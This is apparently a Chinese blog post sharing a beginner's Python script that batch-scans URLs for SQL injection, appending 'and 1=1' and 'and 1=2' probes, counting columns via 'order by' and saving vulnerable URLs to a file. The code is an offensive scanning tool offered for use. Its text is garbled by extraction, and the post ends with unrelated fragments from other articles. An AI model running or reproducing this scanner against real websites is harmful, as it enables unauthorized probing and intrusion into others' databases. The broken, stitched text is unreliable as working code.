python批量檢測注入點指令碼

2022-08-30 18:54:08 字數 3202 閱讀 6739

#


-*- coding:utf-8 -*-


deflogo():


print ("


***                  ")


print ("


*     *                ")


print ("


author:                 *       *               ")


print ("


screw            *                      ")


print ("


*****                 ")


print ("


*                ")


print ("


*       *               ")


print ("


blog:                     *     *                ")


print ("


***                  ")


print ("


")


#執行環境python3.0   批量的話,在本目錄建乙個url.txt檔案將注入點匯入。    


import


threading    


import


requests


i=0err='


true


'exp=['


and 1=1


','and 1=2']


chang=


new_str=""


#判斷注入點


defjudge():


for i in range(2):


request=url+exp[i]


try:


respons1=len(requests.get(request).text)


except


:            


print(u"


**有waf,連線被重置!")


exit()


if(chang[1]!=chang[0]):


print(u'


*******=>存在注入!')


field(url)


else


:         


print(u'


*******==>" 不 "存在注入!')


#判斷字段(field)


deffield(weburl):


j=0a1=""


a2=""


while j<30:


j+=1


if(j%2!=0):


request=weburl+"


order by 


"+str(j)


try:


a1=len(requests.get(request,timeout=1).text)


except


:                


pass


else


:            request=weburl+"


order by 


"+str(j)


try:


a2=len(requests.get(request,timeout=1).text)


except


:                


print(u"


**有waf,連線被重置!")


if(a1!=a2 and j>1):


print(u"


欄位數為********************====>


",j-1)


break#批量


defpiliang():


str=open('


url.txt


',encoding="


utf-8


").read()


a=str.split('\n'


)    url_num=len(a)


for i1 in range(url_num-1):


chang=


print


(a[i1])


for i2 in range(2):


request=a[i1]+exp[i2]


try:


respons1=len(requests.get(request,timeout=1).text)


except


:                


global


err                err='


false


'print(u"


**有waf,連線被重置!")


break


if err=='


true':


if err=='


true


':        


if(chang[1]==chang[0]):


print(u'


*******===>" 不 "存在注入!')


else


:                


print(u'


*******===>存在注入!')


#field(a[i1])


new_str=a[i1]+'\n'


o=open('


ture_sql.txt


','a')


o.write(new_str)


err='


true


'print(u'


1.批量注入,存在本目錄的1.txt  2.單點注入,並判斷字段數 ')


id=int(input("


id? :"))


if(id==1):


t1=threading.thread(target=piliang)


t1.start()


t1.join()


elif(id==2):


url=input('


url :')


judge()


t2=threading.thread(target=field,args=(url,))


t2.join()


else


:    


print(u"


輸入錯誤!")


logo()

本指令碼是在自己學完python練手的第乙個指令碼,所以結構比較混亂,但是效果還是不錯的。基本沒有誤報!

python 批量改名指令碼

第66屆艾美獎上,絕命毒師 一舉拿下了劇情類最佳劇集 最佳男主 最佳男女配角和最佳劇本5項重要大獎,成為艾美獎最大的贏家。這部歷時六年,共62集的劇集憑藉metacritic metacritic的評分是收錄各 的評分,並綜合得出的評分 99分 滿分100 的成績,成為寫入健力士世界紀錄大全的 世界...

shell 指令碼批量檢測主機存活狀態

liunx 伺服器管理中,有時需要檢測主機的存活狀態,當主機不多的時候,可以直接使用ping 命令,當主機很多的時候直接使用ping 命令管理起來就比較麻煩了,使用shell 指令碼編寫的ping 命令檢測主機存活狀態,是乙個很好的方法。1 2 3 4 5 6 7 8 9 10 11 12 13 1...

python批量造數指令碼

coding utf8 from pymysql import connect,cursors from pymysql.err import operationalerror import sys,time class database 類名和模組名一致,robot匯入時不用寫類名 def ini...